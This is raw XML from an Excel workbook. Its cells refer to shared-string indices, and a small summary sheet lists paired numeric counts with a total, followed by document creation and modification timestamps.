    <row r="546" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A546" s="1" t="s">
        <v>1094</v>
      </c>
      <c r="B546" s="1"/>
      <c r="C546" s="1" t="s">
        <v>286</v>
      </c>
      <c r="D546" s="1" t="s">
        <v>1070</v>
      </c>
      <c r="E546" s="1"/>
      <c r="F546" s="1" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="547" spans="1:6" ht="17" x14ac:dyDescent="0.2">
      <c r="A547" s="1" t="s">
        <v>1095</v>
      </c>
      <c r="B547" s="1" t="s">
        <v>304</v>
      </c>
      <c r="C547" s="1" t="s">
        <v>442</v>
      </c>
      <c r="D547" s="1" t="s">
        <v>689</v>
      </c>
      <c r="E547" s="1"/>
      <c r="F547" s="1" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="548" spans="1:6" ht="255" x14ac:dyDescent="0.2">
      <c r="A548" s="1" t="s">
        <v>1096</v>
      </c>
      <c r="B548" s="1"/>
      <c r="C548" s="1" t="s">
        <v>359</v>
      </c>
      <c r="D548" s="1" t="s">
        <v>1071</v>
      </c>
      <c r="E548" s="1"/>
      <c r="F548" s="1" t="s">
        <v>1059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BE483-AB9A-D944-9D49-B1DEC612B8FB}">
  <dimension ref="A3:C15"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A12" sqref="A12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="115" customWidth="1"/>
    <col min="2" max="2" width="15.5" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="11" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>1097</v>
      </c>
      <c r="B3" t="s">
        <v>1099</v>
      </c>
      <c r="C3" t="s">
        <v>1100</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="3" t="s">
        <v>801</v>
      </c>
      <c r="B4">
        <v>61</v>
      </c>
      <c r="C4">
        <v>77</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="3" t="s">
        <v>1059</v>
      </c>
      <c r="B5">
        <v>19</v>
      </c>
      <c r="C5">
        <v>25</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="3" t="s">
        <v>1017</v>
      </c>
      <c r="B6">
        <v>17</v>
      </c>
      <c r="C6">
        <v>26</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="3" t="s">
        <v>898</v>
      </c>
      <c r="B7">
        <v>8</v>
      </c>
      <c r="C7">
        <v>34</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="3" t="s">
        <v>803</v>
      </c>
      <c r="B8">
        <v>32</v>
      </c>
      <c r="C8">
        <v>48</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="3" t="s">
        <v>709</v>
      </c>
      <c r="B9">
        <v>47</v>
      </c>
      <c r="C9">
        <v>83</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="3" t="s">
        <v>802</v>
      </c>
      <c r="B10">
        <v>54</v>
      </c>
      <c r="C10">
        <v>69</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="3" t="s">
        <v>463</v>
      </c>
      <c r="B11">
        <v>10</v>
      </c>
      <c r="C11">
        <v>32</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="3" t="s">
        <v>528</v>
      </c>
      <c r="B12">
        <v>35</v>
      </c>
      <c r="C12">
        <v>60</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="3" t="s">
        <v>960</v>
      </c>
      <c r="B13">
        <v>17</v>
      </c>
      <c r="C13">
        <v>30</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A14" s="3" t="s">
        <v>331</v>
      </c>
      <c r="B14">
        <v>28</v>
      </c>
      <c r="C14">
        <v>63</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A15" s="3" t="s">
        <v>1098</v>
      </c>
      <c r="B15">
        <v>328</v>
      </c>
      <c r="C15">
        <v>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2025-02-26T18:54:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-25T13:12:31Z</dcterms:modified>
</cp:coreProperties>
</file>